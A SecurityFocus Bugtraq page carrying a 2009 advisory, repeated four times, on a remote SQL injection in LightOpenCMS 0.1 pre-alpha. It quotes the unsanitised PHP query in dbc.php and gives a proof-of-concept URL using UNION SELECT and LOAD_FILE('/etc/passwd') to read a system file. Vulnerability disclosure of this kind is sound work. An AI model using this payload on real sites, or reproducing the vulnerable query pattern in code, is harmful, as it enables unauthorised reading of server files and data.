Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
LightOpenCMS 0.1 pre-alpha Remote SQL Injection
Jun 05 2009 01:38PM
Salvatore \drosophila\ Fresta (drosophilaxxx gmail com)
******** Salvatore "drosophila" Fresta ********
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query("SELECT * FROM pages WHERE
id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
...
***************************************************
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23
***************************************************
[+] Fix
No fix.
***************************************************
--
Salvatore Fresta aka drosophila
CWNP444351
******** Salvatore "drosophila" Fresta ********
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
...
***************************************************
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23
***************************************************
[+] Fix
No fix.
***************************************************
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query("SELECT * FROM pages WHERE
id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
...
***************************************************
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT
1,2,LOAD_FILE('/etc/passwd'),4%23
***************************************************
[+] Fix
No fix.
***************************************************
--
Salvatore Fresta aka drosophila
CWNP444351
******** Salvatore "drosophila" Fresta ********
[+] Application: LightOpenCMS
[+] Version: 0.1 pre-alpha
[+] Website: http://sourceforge.net/projects/lightopencms
[+] Bugs: [A] Remote SQL Injection
[+] Exploitation: Remote
[+] Date: 05 Jun 2009
[+] Discovered by: Salvatore Fresta aka drosophila
[+] Author: Salvatore Fresta aka drosophila
[+] E-mail: drosophilaxxx [at] gmail.com
***************************************************
[+] Menu
1) Bugs
2) Code
3) Fix
***************************************************
[+] Bugs
- [A] Remote SQL Injection
[-] Risk: medium
[-] Requisites: magic_quotes_gpc = off
[-] File affected: dbc.php
This bug allows a guest to inject arbitrary SQL
statments.
...
if (isset($_GET['id'])) {
$result = mysql_query("SELECT * FROM pages WHERE id='".$_GET['id']."'");
return mysql_fetch_assoc($result);
...
***************************************************
[+] Code
- [A] Remote SQL Injection
http://www.site.com/path/index.php?id=-1' UNION ALL SELECT 1,2,LOAD_FILE('/etc/passwd'),4%23
***************************************************
[+] Fix
No fix.
***************************************************
[ reply ]